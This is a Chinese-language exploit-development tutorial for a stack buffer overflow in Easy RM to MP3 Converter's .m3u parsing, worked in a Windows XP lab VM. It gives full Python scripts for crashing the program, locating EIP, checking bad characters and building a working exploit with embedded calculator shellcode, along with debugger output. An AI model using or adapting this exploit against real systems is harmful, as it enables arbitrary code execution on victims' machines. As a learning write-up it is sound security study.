EasyRMtoMP3 Converter '.m3u'格式转换之缓冲区溢出
0x00.POC实践环境及工具
- VMware + WinXP_SP3_EN
- Immunity Debugger 1.85
- Vulnerable App获取: https://www.exploit-db.com/exploits/10374/
0x02.溢出攻击简介
Easy RM to MP3 Converter 2.7.3.700版本在对.m3u格式文件进行转换时文件内容加载时未对对应缓冲区大小进行检查,可导致栈溢出攻击
0x03.漏洞Fuzzer
Crash_Fuzzer.py
1 #Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python 2 3 f = open('crash_py.m3u','w') 4 f.write("\x41"*10000) 5 f.close() 6 print "Crash File m3u Create Successful.. \n"
执行脚本生成crash_py.m3u文件,Easy RM to MP3 Converter载入,修改”\x41”的数量10000~20000~30000字节,25000~30000字节之间执行后程序直接报错
0x04.构造Exploit
- 定位EIP的相对偏移大小:
使用metasploit-framework附带小工具pettarn_creat.rb生成测试字符串
ruby pattern_create.rb -l 5000 > C:\pattern.txt
Streip = (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A...省省省...b6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk”)
替换Fuzzer中的Buffer
Crash_Find_EIP.py
1 #Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python 2 3 f = open('crash_py.m3u','w') 4 f.write("\x41"*25000 + (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A...省省省...b6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk”)
5 f.close() 6 print "Crash File m3u Create Successful.. \n"
执行脚本
返回错误EIP地址: 356a4234
接下来使用pattern_offset.rb定位出错EIP偏移位置
ruby pattern_offset.rb -q 356a4234 -l 5000
计算出偏移地址1064字节
EIP位置位于m3u文件偏移25000 + 1064 = 26064字节处
2.确定“JMP ESP”的地址
选取C:\WINDOWS\system32\SHELL32.dll文件中的一条”JMP ESP”指令的地址值
可以发现有相当多的地址可选,这里我们随便选取第一条:7c9d30d7.
3.剔除坏字符:
构造.m3u文件,将需要存放ShellCode的位置放入\x00~\Xff字符串(先去掉\x00)
1 #Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python 2 3 junk = "\x41" * 26064 4 eipaddr = "\xd7\x30\x9d\x7c" #jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d7 5 6 #BadChar: \x00, 7 CharCheck = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" 9 "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 #Bad Characters Check 16 17 data = junk + eipaddr + CharCheck 18 19 f = open('crash_py.m3u','w') 20 f.write(data) 21 f.close() 22 print "Crash File m3u Create Successful.. \n"
运行生成m3u文件,重载程序,在7c9d30d7处下断点,执行至该处断下
查看当前[ESP-8]处的内存区
发现坏字符\x09,循环以往,共剔除坏字符”\x00,\x01,\x09,\x0a”
4.构造ShellCode:
这里我们直接选用网上一段不含以上坏字符的弹出计算器的ShellCode:
1 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" 2 "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 3 "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 4 "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 5 "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 6 "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 7 "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 8 "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 9 "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 10 "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 11 "\x7f\xe8\x7b\xca")
0x04.编写Exploit:
1 #Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python 2 3 junk = "\x41" * 26064 4 eipaddr = "\xd7\x30\x9d\x7c" #jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d7 5 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" 6 "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 7 "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 8 "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 9 "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 10 "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 11 "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 12 "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 13 "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 14 "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 15 "\x7f\xe8\x7b\xca") 16 17 data = junk + eipaddr + shellcode 18 19 f = open('crash_py.m3u','w') 20 f.write(data) 21 f.close() 22 print "Crash File m3u Create Successful.. \n"
0x05.攻击测试
重新生成m3u文件,Windbg重载的Easy RM to MP3 Converter,再次在7c9d30d7处下断点,执行至该处断下
1 0:000> dd /c 5 000ffd30 2 000ffd30 7c9d30d7 c931c0db 70167cbf 2474d9cc 581eb1f4 3 000ffd44 83187831 7803fce8 3085f468 c965bc78 f523b678 4 000ffd58 7daeb4f3 323aaa02 ed62bf1c 66d5541d 96e72129 5 000ffd6c ca71f560 14f53506 1bfb7cc7 27f06b05 22fd48dd 6 000ffd80 e8a21b38 7a3bf7c3 234f4ccf 57a453d3 833bd8f7 7 000ffd94 571f838e a1516453 c6f5cd33 987ec1f5 05f1aaf5 8 000ffda8 3d9926a8 fed9c03b
F10单步执行一次
1 0:000> p 2 eax=00000001 ebx=00104a58 ecx=7c91003d edx=00ce0000 esi=77c5fce0 edi=00006664 3 eip=000ffd38 esp=000ffd38 ebp=00104678 iopl=0 nv up ei pl nz ac pe nc 4 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 5 000ffd38 bf7c1670cc mov edi,0CC70167Ch
查看此时ESP堆栈
1 0:000> dd /c 5 000ffd38 2 000ffd38 70167cbf 2474d9cc 581eb1f4 83187831 7803fce8 3 000ffd4c 3085f468 c965bc78 f523b678 7daeb4f3 323aaa02 4 000ffd60 ed62bf1c 66d5541d 96e72129 ca71f560 14f53506 5 000ffd74 1bfb7cc7 27f06b05 22fd48dd e8a21b38 7a3bf7c3 6 000ffd88 234f4ccf 57a453d3 833bd8f7 571f838e a1516453 7 000ffd9c c6f5cd33 987ec1f5 05f1aaf5 3d9926a8 fed9c03b 8 000ffdb0 0eb66151 8719852f
可以发现此时ShellCode的执行跳过的“c931c0db”一段,那么“JMP ESP”后面添加4个nop指令
修改Exploit:
1 #Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 Write With Python 2 3 junk = "\x41" * 26064 4 eipaddr = "\xd7\x30\x9d\x7c" #jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d7 5 nops = "\x90"*8 6 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" 7 "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 8 "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 9 "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 10 "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 11 "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 12 "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 13 "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 14 "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 15 "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 16 "\x7f\xe8\x7b\xca") 17 18 data = junk + eipaddr + nops + shellcode 19 20 f = open('crash_py.m3u','w') 21 f.write(data) 22 f.close() 23 print "Crash File m3u Create Successful.. \n"
重新生成m3u文件,重载EasyRMtoMP3Converter
发现nops字节数仍然不够,那么再增加4个\x90
ShellCode成功执行
0x06.参考资料
Corelan Team: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Pocket Strom: https://packetstormsecurity.com/files/101960/Easy-RM-to-MP3-Converter-2.7.3.700-Stack-Buffer-Overflow.html
Exploit-DB: https://www.exploit-db.com/exploits/10374/
Marcelo Carvalho: https://www.youtube.com/watch?v=aEZKGW_VTd4&t=181s
浙公网安备 33010602011771号